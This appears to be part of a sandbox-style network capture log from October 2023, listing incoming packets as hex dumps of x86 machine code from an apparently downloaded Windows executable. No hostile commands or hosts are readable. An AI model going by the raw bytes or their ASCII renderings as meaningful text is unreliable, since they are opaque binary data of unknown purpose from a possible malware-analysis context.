2023-10-05 16:48:05 UTC	8	IN	Data Raw: 09 00 83 c4 0c ff 34 24 ff 15 40 db 4f 00 56 e8 2d 6e 03 00 83 c4 04 55 53 57 68 84 e1 4d 00 e8 5d 5d 03 00 83 c4 10 89 c6 bf 01 00 00 00 e9 32 08 00 00 3d 80 01 00 00 0f 84 d7 08 00 00 3d 90 01 00 00 0f 85 47 09 00 00 6a 01 68 d4 70 4c 00 ff 35 38 17 50 00 89 d6 e8 34 d9 00 00 89 f2 83 c4 0c e9 b6 09 00 00 83 f8 50 0f 84 b3 08 00 00 83 f8 60 0f 85 17 09 00 00 ff 35 38 17 50 00 89 d6 e8 db b4 00 00 e9 8d 09 00 00 3d a0 01 00 00 0f 84 e1 08 00 00 3d 70 f0 00 00 0f 85 ef 08 00 00 81 fa 12 01 00 00 0f 85 70 09 00 00 c6 05 cb 1d 50 00 01 55 53 68 12 01 00 00 57 ff 15 98 d7 4f 00 89 c6 c6 05 cb 1d 50 00 00 8b 8c 24 80 08 00 00 31 e1 e8 68 b7 09 00 89 f0 e9 59 09 00 00 31 c0 f6 c3 10 0f 94 c0 83 c8 02 f6 c3 01 89 ef bd 01 00 00 00 0f 44 e8 e8 64 7d 00 00 88 04 Data Ascii: 4$@OV-nUSWhM]]2==GjhpL58P4P`58P==ppPUShWOP$1hY1Dd}
2023-10-05 16:48:05 UTC	16	IN	Data Raw: c4 0c a3 10 17 50 00 56 6a 00 6a 00 e8 10 3f 03 00 83 c4 0c a3 14 17 50 00 6a 78 ff 35 f0 0b 50 00 e8 cb 2b 03 00 83 c4 08 0f b6 f0 c1 e6 15 81 ce 00 00 cf 00 6a 7a ff 35 f0 0b 50 00 e8 5f 2c 03 00 83 c4 08 89 f1 81 e1 00 00 ea 00 89 fa 84 d2 0f 45 f1 83 f8 01 0f 44 f1 6a 61 ff 35 f0 0b 50 00 e8 8a 2b 03 00 83 c4 08 0f b6 f8 8d 2c fd 00 00 00 00 68 8a 00 00 00 ff 35 f0 0b 50 00 e8 6d 2b 03 00 83 c4 08 8d 3c fd 00 02 00 00 84 c0 0f 44 fd c6 05 18 17 50 00 01 e8 82 c5 ff ff 6a 00 ff 74 24 5c 6a 00 6a 00 53 ff 74 24 18 68 00 00 00 80 68 00 00 00 80 56 8b 4c 24 24 89 cb 51 50 57 ff 15 8c d7 4f 00 a3 04 00 50 00 85 c0 75 1a ff 15 f8 d9 4f 00 50 e8 c4 83 03 00 83 c4 04 50 68 e3 0b 4e 00 e8 66 08 00 00 c7 05 30 17 50 00 00 00 00 00 c7 05 2c 17 50 00 00 00 00 00 Data Ascii: PVjj?Pjx5P+jz5P_,EDja5P+,h5Pm+<DPjt$\jjSt$hhVL$$QPWOPuOPPhNf0P,P
2023-10-05 16:48:05 UTC	24	IN	Data Raw: b8 8a 7f 00 00 83 f9 01 74 1e 85 c9 75 56 31 c0 80 3d a1 17 50 00 00 0f 94 c0 0d 00 7f 00 00 31 db eb 05 b8 02 7f 00 00 50 6a 00 ff 15 70 d8 4f 00 89 c6 50 6a f4 ff 35 04 00 50 00 ff 15 dc d8 4f 00 56 ff 15 e4 d8 4f 00 38 1d a0 17 50 00 74 10 0f b6 c3 50 ff 15 18 d9 4f 00 88 1d a0 17 50 00 5e 5b c3 68 78 04 00 00 68 ba 31 4f 00 68 02 8b 4f 00 e8 0c 71 0a 00 83 c4 0c e8 01 00 00 00 cc e8 2c 78 0a 00 cc cc cc cc cc cc cc cc cc cc cc 57 56 83 3d a4 17 50 00 00 74 17 68 06 13 00 00 68 ba 31 4f 00 68 f8 2e 4f 00 e8 d4 70 0a 00 83 c4 0c a1 04 00 50 00 31 ff 85 c0 74 1e 50 ff 15 f4 d7 4f 00 85 c0 74 13 89 c6 6a 00 ff 35 78 17 50 00 50 ff 15 04 d7 4f 00 89 f7 89 3d a4 17 50 00 85 ff 0f 95 c0 5e 5f c3 cc cc cc cc cc cc cc 55 53 57 56 83 ec 08 8d 7c 24 38 8b 6c 24 Data Ascii: tuV1=P1PjpOPj5POVO8PtPOP^[hxh1OhOq,xWV=Pthh1Oh.OpP1tPOtj5xPPO=P^_USWV\|$8l$
2023-10-05 16:48:05 UTC	32	IN	Data Raw: 8b 4c 24 10 31 e1 e8 76 5a 09 00 83 c4 14 5e 5f c3 a1 70 17 50 00 85 c0 74 0d 8b 08 ff 74 24 08 50 ff 51 34 83 c4 08 c3 cc cc cc cc cc cc cc cc cc 57 56 a1 04 00 50 00 31 f6 85 c0 74 1e 50 ff 15 f4 d7 4f 00 85 c0 74 13 89 c7 6a 00 ff 35 78 17 50 00 50 ff 15 04 d7 4f 00 89 fe 89 f0 5e 5f c3 55 53 57 56 81 ec ac 00 00 00 89 54 24 14 89 ca 8b bc 24 cc 00 00 00 a1 34 00 50 00 31 e0 31 db 89 f9 83 e1 03 0f 95 c3 83 c3 01 0f af 1d 00 17 50 00 8b 8c 24 c8 00 00 00 89 0c 24 c1 e9 16 80 e1 01 89 84 24 a8 00 00 00 89 de d3 e3 83 e7 03 74 15 8d 04 12 8b 0d 38 17 50 00 3b 81 2c 01 00 00 0f 8d 53 0f 00 00 a1 04 17 50 00 31 ed f7 84 24 c8 00 00 00 00 00 00 40 75 0a c7 44 24 0c 00 00 00 00 eb 49 83 3d b0 17 50 00 00 74 0f 8b 0d 38 17 50 00 80 b9 43 01 00 00 00 74 de 8b Data Ascii: L$1vZ^_pPtt$PQ4WVP1tPOtj5xPPO^_USWVT$$4P11P$$$t8P;,SP1$@uD$I=Pt8PCt
2023-10-05 16:48:05 UTC	39	IN	Data Raw: 89 44 24 1a d9 6c 24 1a db 5c 24 40 d9 6c 24 06 8b 44 24 40 39 c6 0f 4c f0 d9 c0 d8 84 24 a4 00 00 00 d8 84 24 a8 00 00 00 d8 84 24 ac 00 00 00 d9 7c 24 04 0f b7 44 24 04 0d 00 0c 00 00 66 89 44 24 18 d9 6c 24 18 db 5c 24 44 d9 6c 24 04 8b 44 24 44 39 c6 0f 4c f0 d9 c0 d8 84 24 b0 00 00 00 d8 84 24 b4 00 00 00 d8 84 24 b8 00 00 00 d9 7c 24 02 0f b7 44 24 02 0d 00 0c 00 00 66 89 44 24 16 d9 6c 24 16 db 5c 24 48 d9 6c 24 02 8b 44 24 48 39 c6 0f 4c f0 d8 84 24 bc 00 00 00 d8 84 24 c0 00 00 00 d8 84 24 c4 00 00 00 d9 3c 24 0f b7 04 24 0d 00 0c 00 00 66 89 44 24 14 d9 6c 24 14 db 5c 24 4c d9 2c 24 8b 44 24 4c 39 c6 0f 4c f0 eb 03 8b 76 18 8b 8c 24 c8 00 00 00 31 e1 e8 5d 3a 09 00 89 f0 81 c4 cc 00 00 00 5e c3 cc cc cc ff 35 04 00 50 00 ff 15 68 d8 4f 00 85 c0 Data Ascii: D$l$\$@l$D$@9L$$$\|$D$fD$l$\$Dl$D$D9L$$$\|$D$fD$l$\$Hl$D$H9L$$$<$$fD$l$\$L,$D$L9Lv$1]:^5PhO
2023-10-05 16:48:05 UTC	47	IN	Data Raw: 05 0c 06 00 00 eb 1c 90 90 90 90 90 90 90 90 90 90 8b 04 24 8b 80 6c 10 00 00 0f b6 cb 8d 04 48 83 c0 0c 0f b7 18 6a 00 6a 02 52 6a 02 8d 84 24 98 00 00 00 50 ff 74 24 28 89 d7 e8 e1 cb 02 00 83 c4 18 8d 8b ff ff fe ff 81 f9 fe ff 0f 00 0f 87 3c ff ff ff 8d 93 00 00 ff 03 c1 ea 0a 81 c2 00 d8 ff ff 8d 4f 01 81 e3 ff 03 00 00 81 cb 00 dc 00 00 66 89 5c 78 02 e9 18 ff ff ff 90 90 90 90 81 4c 24 48 00 00 00 80 8b 44 24 30 8b 4c 24 10 eb 18 90 90 90 90 90 90 90 90 90 90 90 90 90 90 8b 44 24 30 8b 4c 24 10 89 fa 8b 6c 24 08 8b 5c 24 18 84 db 0f 85 a8 00 00 00 89 54 24 04 8b 3c 24 8b 47 18 8b 4c 24 10 8b 0c 88 89 ea ff 74 24 44 e8 7a a5 00 00 8b 4c 24 14 83 c4 04 8b 47 18 8b 04 88 8b 40 14 89 ee 8b 6c 24 64 8b 54 24 28 89 14 28 8b 47 18 8b 04 88 8b 40 14 8b 54 Data Ascii: $lHjjRj$Pt$(<Of\xL$HD$0L$D$0L$l$\$T$<$GL$t$DzL$G@l$dT$((G@T
2023-10-05 16:48:05 UTC	55	IN	Data Raw: 11 00 00 00 00 00 00 c7 86 14 11 00 00 00 00 00 00 c7 86 18 11 00 00 00 00 00 00 c7 86 1c 11 00 00 00 00 00 00 c7 86 20 11 00 00 01 00 00 00 c7 86 2c 11 00 00 01 00 00 00 c7 86 30 11 00 00 00 00 00 00 c7 86 70 10 00 00 00 00 00 00 c6 86 ac 10 00 00 01 c6 86 5d 01 00 00 00 68 dc 14 4f 00 e8 1c 03 03 00 83 c4 04 89 86 34 11 00 00 68 dc 14 4f 00 e8 09 03 03 00 83 c4 04 89 86 38 11 00 00 c7 86 40 11 00 00 00 00 00 00 c7 86 3c 11 00 00 00 00 00 00 c6 86 44 11 00 00 00 c7 86 dc 20 00 00 00 00 00 00 c6 86 c4 20 00 00 00 c6 86 c6 20 00 00 00 c6 86 c8 20 00 00 00 66 c7 86 ca 20 00 00 00 00 c6 86 cc 20 00 00 00 66 c7 86 ce 20 00 00 00 00 c6 86 d0 20 00 00 00 c7 86 a8 20 00 00 00 00 00 00 c7 86 ac 20 00 00 00 00 00 00 c7 86 b0 20 00 00 00 00 00 00 c7 86 b4 20 00 00 Data Ascii: ,0p]hO4hO8@<D f f
2023-10-05 16:48:05 UTC	63	IN	Data Raw: 46 30 00 00 00 00 80 be 0a 11 00 00 00 74 2c c7 46 10 00 00 00 00 c6 86 42 01 00 00 01 80 be 79 10 00 00 00 75 15 c6 86 79 10 00 00 01 56 68 a0 7a 41 00 e8 49 53 01 00 83 c4 08 8b 86 50 10 00 00 85 c0 74 09 50 e8 46 8d 02 00 83 c4 04 c7 86 54 10 00 00 00 00 00 00 c7 86 58 10 00 00 00 00 00 00 8d 47 0c 6a 00 6a 02 50 e8 92 8c 02 00 83 c4 0c 89 86 50 10 00 00 80 be 5c 01 00 00 00 74 23 8b 86 60 10 00 00 85 c0 74 12 6a 00 6a 06 68 2e d5 4d 00 50 e8 a7 bf 00 00 83 c4 10 c6 86 5d 01 00 00 01 85 ff 0f 8e e2 00 00 00 8b 6c 24 1c 8d 3c 7d 00 00 00 00 01 ef eb 37 90 90 90 90 90 90 89 d8 f7 c3 60 ff 00 00 74 55 8b 6c 24 18 8b 85 50 10 00 00 8b 8d 54 10 00 00 8d 51 01 89 95 54 10 00 00 66 89 1c 48 89 f5 39 fe 0f 83 9c 00 00 00 8d 75 02 0f b7 5d 00 83 fb 0d 75 c3 89 Data Ascii: F0t,FByuyVhzAISPtPFTXGjjPP\t#`tjjh.MP]l$<}7`tUl$PTQTfH9u]u
2023-10-05 16:48:05 UTC	71	IN	Data Raw: d0 83 f8 0a 0f 83 fb 05 00 00 8b 86 90 01 00 00 3d 99 99 99 19 77 14 01 c0 8d 04 80 b9 cf ff ff ff 29 d1 39 c8 0f 86 1c 06 00 00 c7 86 90 01 00 00 ff ff ff ff e9 97 20 00 00 8b 86 18 02 00 00 85 c0 b9 0f 00 00 00 bf 15 00 00 00 0f 44 cf 8d 5a d0 83 fb 0a 0f 82 ce 04 00 00 83 fa 41 0f 8c ac 04 00 00 8d 79 37 39 fa 0f 8f a1 04 00 00 83 c2 c9 e9 b0 04 00 00 8d 42 f9 83 f8 14 0f 87 50 04 00 00 ff 24 85 e0 7c 4c 00 8b 04 24 c7 00 00 00 00 00 e9 39 20 00 00 83 fa 5c 0f 85 9d 02 00 00 89 f1 e8 89 6b 00 00 c7 86 24 0e 00 00 00 00 00 00 e9 1a 20 00 00 81 fa 9c 00 00 00 0f 85 14 02 00 00 89 f1 e8 67 6b 00 00 c7 86 24 0e 00 00 00 00 00 00 e9 f8 1f 00 00 c7 86 24 0e 00 00 00 00 00 00 c6 86 42 01 00 00 01 80 be 79 10 00 00 00 75 19 c6 86 79 10 00 00 01 56 68 a0 7a 41 Data Ascii: =w)9 DZAy79BP$\|L$9 \k$ gk$$ByuyVhzA
2023-10-05 16:48:05 UTC	78	IN	Data Raw: 01 00 00 8b 86 2c 01 00 00 39 c1 0f 47 c8 89 8e 90 01 00 00 85 c9 8b 86 98 00 00 00 ba 01 00 00 00 0f 45 d1 89 c1 85 d2 0f 8e 9b 09 00 00 89 c3 e9 c1 08 00 00 f6 46 01 20 0f 84 52 01 00 00 8b 86 90 01 00 00 8b 8e 2c 01 00 00 39 c8 0f 47 c1 8b be 94 00 00 00 89 86 90 01 00 00 85 c0 ba 01 00 00 00 0f 45 d0 03 96 98 00 00 00 e9 ed 00 00 00 8b 86 2c 01 00 00 8b 8e 90 01 00 00 0f af 86 28 01 00 00 39 c1 0f 46 c1 89 86 90 01 00 00 8b 96 70 10 00 00 85 d2 0f 84 f4 00 00 00 85 c0 0f 84 ec 00 00 00 89 f1 e8 a5 4f 00 00 83 be 90 01 00 00 02 0f 82 d8 00 00 00 bf 01 00 00 00 8b 96 70 10 00 00 89 f1 e8 86 4f 00 00 83 c7 01 3b be 90 01 00 00 72 e8 e9 b6 00 00 00 f6 46 01 20 0f 84 ac 00 00 00 8b 8e 28 01 00 00 8b 86 90 01 00 00 39 c8 0f 47 c1 89 86 90 01 00 00 0f b6 9e Data Ascii: ,9GEF R,9GE,(9FpOpO;rF (9G
2023-10-05 16:48:06 UTC	86	IN	Data Raw: c0 31 c9 8b 54 24 04 39 97 3c 0e 00 00 0f 9f c1 0f 44 c8 80 f9 01 8b 74 24 08 75 4d 31 c0 8b 4c 24 0c 39 8f 38 0e 00 00 0f 9c c0 31 c9 39 b7 34 0e 00 00 0f 9c c1 0f 44 c8 80 f9 01 75 2b 8d 87 34 0e 00 00 c7 87 28 0e 00 00 00 00 00 00 c7 40 0c 00 00 00 00 c7 40 08 00 00 00 00 c7 40 04 00 00 00 00 c7 00 00 00 00 00 8b 44 24 04 0b 04 24 0f 94 c3 0f 85 92 00 00 00 3b b7 28 01 00 00 0f 85 86 00 00 00 85 f6 7e 64 8b 8f 2c 01 00 00 31 c0 89 f2 eb 13 90 90 90 90 90 90 90 90 90 90 90 90 83 c0 01 39 d0 7d 45 85 c9 7e f5 31 d2 be 04 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 8b 4f 18 8b 0c 81 8b 49 14 81 0c 31 ff ff 03 00 83 c2 01 8b 8f 2c 01 00 00 83 c6 14 39 ca 7c e0 8b 97 28 01 00 00 8b 74 24 08 eb b4 80 bf 79 10 00 00 00 75 15 c6 87 79 10 00 00 01 57 68 Data Ascii: 1T$9<Dt$uM1L$98194Du+4(@@@D$$;(~d,19}E~1OI1,9\|(t$yuyWh
2023-10-05 16:48:06 UTC	94	IN	Data Raw: 7e 00 00 00 c6 86 d0 20 00 00 01 89 8e d4 20 00 00 83 c7 01 89 be d8 20 00 00 8b 96 28 01 00 00 85 d2 7e 55 8b 8e 2c 01 00 00 31 c0 eb 0a 90 90 90 83 c0 01 39 d0 7d 41 85 c9 7e f5 31 d2 bf 04 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 8b 4e 18 8b 0c 81 8b 49 14 81 0c 39 ff ff 03 00 83 c2 01 8b 8e 2c 01 00 00 83 c7 14 39 ca 7c e0 8b 96 28 01 00 00 eb b8 80 be 79 10 00 00 00 74 05 83 c4 08 eb 15 c6 86 79 10 00 00 01 56 68 a0 7a 41 00 e8 e8 d5 00 00 83 c4 10 5e 5f 5b 5d c3 55 53 57 56 83 ec 18 89 d7 89 ce 8b 5c 24 38 8b 54 24 34 a1 34 00 50 00 31 e0 89 44 24 14 0f b7 02 3d fe df 00 00 0f 85 92 00 00 00 80 7f 18 00 0f 84 2e 01 00 00 83 fb 01 0f 85 45 01 00 00 f7 44 24 3c 00 00 40 00 75 17 68 6b 17 00 00 68 4e 45 4f 00 68 00 6d 4f 00 e8 46 57 09 00 83 Data Ascii: ~ (~U,19}A~1NI9,9\|(ytyVhzA^_[]USWV\$8T$44P1D$=.ED$<@uhkhNEOhmOFW
2023-10-05 16:48:06 UTC	102	IN	Data Raw: 09 00 83 c4 0c 8b 76 14 8d 04 ad 00 00 00 00 01 e8 8b 7c 86 10 85 ff 74 52 89 44 24 0c 8b 04 24 8b 50 10 01 ef 89 78 10 90 90 90 90 90 90 90 90 90 89 eb 8d 3c ad 00 00 00 00 01 ef 8b 4c be 10 01 cd 85 c9 75 eb 89 d1 29 d9 85 d2 0f 44 ca 8d 44 be 10 89 08 8b 04 24 8b 40 14 8b 4c 24 0c c7 44 88 10 00 00 00 00 8b 5c 24 18 8b 44 24 08 8b 74 24 10 8d 04 86 8b 48 10 89 4e 10 8b 48 0c 89 4e 0c 8b 48 08 89 4e 08 8b 08 8b 50 04 89 56 04 89 0e 8b 48 10 85 c9 0f 84 f4 fe ff ff 89 f2 29 c2 c1 fa 02 69 d2 33 33 33 33 01 d1 89 4e 10 e9 dd fe ff ff 85 db 8b 6c 24 24 74 1d 8d 77 6c f7 db 8d 14 2b 03 97 98 00 00 00 8b 0c 24 56 e8 be ca ff ff 83 c4 04 43 75 e8 83 c4 28 5e 5f 5b 5d c3 53 57 56 89 ce 8a 5c 24 14 8b 44 24 10 85 c0 74 2b 83 f8 01 0f 85 18 04 00 00 8d 42 ff 83 Data Ascii: v\|tRD$$Px<Lu)DD$@L$D\$D$t$HNHNHNPVH)i3333Nl$$twl+$VCu(^_[]SWV\$D$t+B
2023-10-05 16:48:06 UTC	110	IN	Data Raw: 48 4f 00 68 08 94 4f 00 e8 b7 19 09 00 83 c4 0c e8 ac a8 fe ff cc cc cc cc cc cc cc cc cc cc cc cc 8b 54 24 08 8b 44 24 0c 8b 4c 24 04 c7 41 2c 16 00 00 00 50 e8 d7 e8 ff ff 83 c4 04 c3 cc cc cc 55 53 57 56 8b 5c 24 1c 8b 7c 24 18 8b 6c 24 14 6a 00 6a 50 6a 01 e8 25 d1 01 00 83 c4 0c 89 c6 c7 40 40 00 00 00 00 c7 40 44 00 00 00 00 c7 40 48 00 00 00 00 c6 40 4c 00 89 58 04 89 38 8b 44 24 20 89 46 08 8d 5e 0c 53 e8 72 28 02 00 83 c4 04 c7 46 2c 00 00 00 00 8d 46 20 c7 46 20 70 c2 41 00 89 76 24 c6 46 28 00 68 d0 58 42 00 50 53 e8 eb 28 02 00 83 c4 0c 6a 5a 55 e8 30 b4 01 00 83 c4 08 88 46 30 6a 5b 55 e8 22 b4 01 00 83 c4 08 88 46 31 6a 02 55 e8 c4 b4 01 00 83 c4 08 89 46 34 6a 5f 55 e8 b6 b4 01 00 83 c4 08 89 46 38 6a 60 55 e8 a8 b4 01 00 83 c4 08 89 46 3c Data Ascii: HOhOT$D$L$A,PUSWV\$\|$l$jjPj%@@@D@H@LX8D$ F^Sr(F,F F pAv$F(hXBPS(jZU0F0j[U"F1jUF4j_UF8j`UF<
2023-10-05 16:48:06 UTC	118	IN	Data Raw: 90 8b 45 00 8b 40 08 8d 4c 24 34 51 ff 34 98 8d 44 24 18 50 ff b5 dc 00 00 00 56 e8 51 27 00 00 83 c4 14 53 57 ff 75 00 e8 b4 a5 02 00 83 c4 0c 89 c3 85 c0 79 cb 56 6a 00 e8 93 5c 00 00 83 c4 08 6a 00 6a 01 6a 0b 8b b4 24 c8 00 00 00 56 ff 15 cc d8 4f 00 6a 01 6a 00 56 ff 15 54 d8 4f 00 8b 84 24 c8 00 00 00 ff 30 ff 15 ec d8 4f 00 e9 27 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 50 8b 74 24 1c 8b 6c 24 20 b9 02 00 00 00 e8 19 f7 ff ff 89 c7 56 e8 d1 94 01 00 83 c4 04 89 04 24 6a 02 56 e8 b3 95 01 00 83 c4 08 89 c3 55 50 6a 01 ff 37 e8 d3 1d 02 00 83 c4 10 e8 ab d2 fe ff 8d 6f 04 0f b6 c0 53 6a 01 50 55 ff 37 e8 29 95 02 00 83 c4 14 ff 35 7c 77 4c 00 68 a7 22 4e 00 e8 16 a7 01 00 83 c4 08 89 47 2c 89 77 34 55 e8 67 58 00 00 83 c4 04 c6 87 Data Ascii: E@L$4Q4D$PVQ'SWuyVj\jjj$VOjjVTO$0O'USWVPt$l$ V$jVUPj7oSjPU7)5\|wLh"NG,w4UgX
2023-10-05 16:48:06 UTC	125	IN	Data Raw: c1 e1 04 8d 04 89 bf 1f 85 eb 51 f7 ef 89 d0 c1 e8 1f c1 fa 05 01 c2 29 da ff 74 24 30 68 dc 14 4f 00 68 00 02 00 00 68 c0 00 21 50 68 8e 80 4e 00 55 52 ff 76 0c 53 56 e8 14 f9 ff ff 83 c4 28 50 ff 15 84 22 50 00 8b 6e 10 83 c5 03 89 e8 c1 e0 04 8d 04 80 f7 ef 89 d0 c1 e8 1f c1 fa 05 8d 1c 02 83 c3 03 29 dd 8b 46 0c 89 f7 8b 74 24 04 01 f0 ff 74 24 34 68 1d 1d 4e 00 6a 00 68 00 40 01 50 68 33 89 4e 00 6a 0e 55 50 53 57 e8 bf f8 ff ff 83 c4 28 8b 47 0c 01 f0 83 c0 11 ff 74 24 38 68 c0 1e 4e 00 6a 00 68 00 40 01 50 68 33 89 4e 00 6a 0e 55 50 53 57 e8 94 f8 ff ff 83 c4 28 8b 04 24 01 47 0c 83 c4 08 5e 5f 5b 5d c3 cc cc cc 55 53 57 56 83 ec 20 8b 44 24 48 8b 6c 24 44 8b 54 24 38 8b 5c 24 34 80 7c 24 40 00 74 6f 31 ff 39 03 0f 85 1d 04 00 00 8b 74 24 4c b9 7b Data Ascii: Q)t$0hOhh!PhNURvSV(P"Pn)Ft$t$4hNjh@Ph3NjUPSW(Gt$8hNjh@Ph3NjUPSW($G^_[]USWV D$Hl$DT$8\$4\|$@to19t$L{
2023-10-05 16:48:06 UTC	133	IN	Data Raw: eb 1d 31 c9 c6 45 00 26 83 c5 01 0f b6 46 ff 88 45 00 83 c5 01 0f b6 1e 83 c6 01 84 db 74 29 84 c9 74 1e 0f be c1 89 44 24 04 0f b6 c3 50 89 cf e8 9c fe 08 00 89 f9 83 c4 04 3b 44 24 04 74 c2 90 80 fb 26 74 be eb c3 c6 45 00 00 8b 04 24 83 c4 08 5e 5f 5b 5d c3 31 c0 c3 cc cc cc cc cc cc cc 8b 4c 24 08 8b 41 34 3b 44 24 04 74 01 c3 8b 41 38 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 81 ec 60 01 00 00 8b b4 24 78 01 00 00 a1 34 00 50 00 31 e0 89 84 24 5c 01 00 00 a1 90 22 50 00 85 c0 74 06 39 f0 75 16 eb 21 68 7a 3f 4e 00 ff 15 b8 d8 4f 00 a3 90 22 50 00 39 f0 74 0d 81 fe 11 01 00 00 74 05 83 fe 2b 75 49 8b bc 24 74 01 00 00 31 db 83 7f 24 00 0f 8e ff 00 00 00 8b 84 24 7c 01 00 00 0f b7 e8 90 90 90 90 8b 44 9f 04 89 2c 24 68 a0 07 42 00 8d 54 Data Ascii: 1E&FEt)tD$P;D$t&tE$^_[]1L$A4;D$tA8USWV`$x4P1$\"Pt9u!hz?NO"P9tt+uI$t1$$\|D,$hBT
2023-10-05 16:48:06 UTC	141	IN	Data Raw: 99 bd 00 00 00 89 1f 0f b6 b9 be 00 00 00 89 3e 0f b6 89 bf 00 00 00 89 0a 5e 5f 5b c3 cc cc cc cc 8b 44 24 04 8a 80 d0 00 00 00 c3 cc cc cc cc cc 8a 44 24 08 8b 4c 24 04 88 81 d0 00 00 00 c3 cc 56 8b 74 24 08 8d 46 24 c6 86 c8 00 00 00 00 c7 06 00 00 00 00 68 98 00 00 00 6a 00 50 e8 fe d1 07 00 83 c4 0c c6 86 d0 00 00 00 01 5e c3 cc cc 57 56 8b 74 24 10 8b 7c 24 0c 8b 47 24 83 f8 08 72 1a 68 5a 0a 00 00 68 16 3d 4f 00 68 02 7a 4f 00 e8 2d 9c 08 00 83 c4 0c 8b 47 24 8d 48 01 89 4f 24 89 74 87 04 5e 5f c3 cc cc cc cc cc cc cc 56 8b 74 24 08 ff 76 28 e8 53 54 01 00 83 c4 04 ff 76 2c e8 48 54 01 00 83 c4 04 5e c3 cc cc cc 83 ec 08 a1 34 00 50 00 31 e0 89 44 24 04 89 e0 50 68 28 e9 4c 00 6a 01 6a 00 68 38 e9 4c 00 ff 15 50 d7 4f 00 85 c0 75 14 8b 04 24 8b 08 Data Ascii: >^_[D$D$L$Vt$F$hjP^WVt$\|$G$rhZh=OhzO-G$HO$t^_Vt$v(STv,HT^4P1D$Ph(Ljjh8LPOu$
2023-10-05 16:48:06 UTC	149	IN	Data Raw: ff ff ff 0f 43 c1 c3 cc cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 20 8b 7c 24 3c 8b 5c 24 38 8b 6c 24 34 a1 34 00 50 00 31 e0 89 44 24 1c 6a 00 6a 10 6a 01 e8 07 35 01 00 83 c4 0c 89 c6 89 28 89 58 04 89 78 08 8b 3d 4c 2b 50 00 89 f8 85 ff 75 2c 68 10 60 42 00 e8 84 46 01 00 83 c4 04 89 c7 a3 4c 2b 50 00 85 c0 75 14 68 10 60 42 00 e8 6c 46 01 00 83 c4 04 a3 4c 2b 50 00 31 ff 89 e3 50 53 e8 b9 51 01 00 eb 0e 90 90 90 90 90 90 90 55 53 e8 d9 51 01 00 83 c4 08 8b 04 24 85 c0 74 2b 8b 40 0c bd ff ff ff ff 39 44 24 04 7c e1 bd 01 00 00 00 74 da 6a 50 68 64 37 4f 00 68 e4 15 4f 00 e8 bc 7c 08 00 83 c4 0c eb c4 8b 44 24 04 89 46 0c 56 57 e8 a6 46 01 00 83 c4 08 39 f0 74 14 6a 63 68 64 37 4f 00 68 82 17 4f 00 e8 91 7c 08 00 83 c4 0c 8b 4c 24 1c 31 e1 e8 c0 84 Data Ascii: CUSWV \|$<\$8l$44P1D$jjj5(Xx=L+Pu,h`BFL+Puh`BlFL+P1PSQUSQ$t+@9D$\|tjPhd7OhO\|D$FVWF9tjchd7OhO\|L$1
2023-10-05 16:48:06 UTC	157	IN	Data Raw: 89 44 24 30 8b 44 24 34 8b 4c 24 30 50 51 68 20 82 42 00 68 b5 e7 4d 00 6a 64 6a 6e 68 f4 eb 4e 00 57 e8 ba 0f 02 00 83 c4 20 c7 40 0c 00 00 00 00 89 06 6a 64 6a 01 57 e8 54 0e 02 00 83 c4 0c 6a 19 6a 4b 6a 02 57 e8 45 0e 02 00 83 c4 10 56 e8 0c 07 02 00 83 c4 04 89 44 24 2c 8b 44 24 2c 50 68 d0 82 42 00 68 b5 e7 4d 00 6a 00 6a 00 57 e8 5c 13 02 00 83 c4 18 c7 40 0c 00 00 00 00 c7 40 28 06 00 00 00 89 46 04 56 e8 d2 06 02 00 83 c4 04 89 44 24 28 8b 44 24 28 50 68 60 83 42 00 68 b5 e7 4d 00 6a 6c 68 8c 76 4e 00 57 e8 6f 12 02 00 83 c4 18 c7 40 0c 01 00 00 00 56 e8 9f 06 02 00 83 c4 04 89 44 24 24 8b 44 24 24 50 68 80 83 42 00 68 b5 e7 4d 00 6a 76 68 00 4b 4e 00 57 e8 3c 12 02 00 83 c4 18 c7 40 0c 01 00 00 00 56 e8 6c 06 02 00 83 c4 04 89 44 24 20 8b 44 24 Data Ascii: D$0D$4L$0PQh BhMjdjnhNW @jdjWTjjKjWEVD$,D$,PhBhMjjW\@@(FVD$(D$(Ph`BhMjlhvNWo@VD$$D$$PhBhMjvhKNW<@VlD$ D$
2023-10-05 16:48:06 UTC	164	IN	Data Raw: 51 08 83 c4 0c 6a 37 ff 76 28 e8 22 dc 00 00 83 c4 08 89 c7 68 f2 bd 4e 00 50 e8 e2 7f 08 00 83 c4 08 8b 0e 8b 11 50 57 51 ff 52 08 83 c4 0c 8b 06 8b 08 6a 01 53 50 ff 51 08 83 c4 0c 89 46 08 c7 46 2c 00 00 00 00 8b 46 20 85 c0 74 09 50 e8 9d 28 ff ff 83 c4 04 8b 4c 24 04 31 e1 e8 df 46 07 00 83 c4 08 5e 5f 5b 5d c3 cc cc cc cc cc cc cc 57 56 83 ec 14 8b 74 24 20 a1 34 00 50 00 31 e0 89 44 24 10 8b 7e 2c 8d 46 3c 50 e8 e0 c2 03 00 83 c4 04 8b 08 89 e2 57 50 52 ff 51 10 83 c4 0c 83 3c 24 00 74 38 8b 46 18 8b 08 6a 00 50 ff 51 58 83 c4 08 8b 46 2c 8b 40 1c ff 30 e8 5f 58 01 00 83 c4 04 8b 14 24 89 f1 50 ff 74 24 10 ff 74 24 10 ff 74 24 10 e8 f5 fd ff ff 83 c4 10 8b 4c 24 10 31 e1 e8 57 46 07 00 83 c4 14 5e 5f c3 cc 8b 44 24 04 ff 70 e8 e8 04 4d 01 00 83 c4 Data Ascii: Qj7v("hNPPWQRjSPQFF,F tP(L$1F^_[]WVt$ 4P1D$~,F<PWPRQ<$t8FjPQXF,@0_X$Pt$t$t$L$1WF^_D$pM
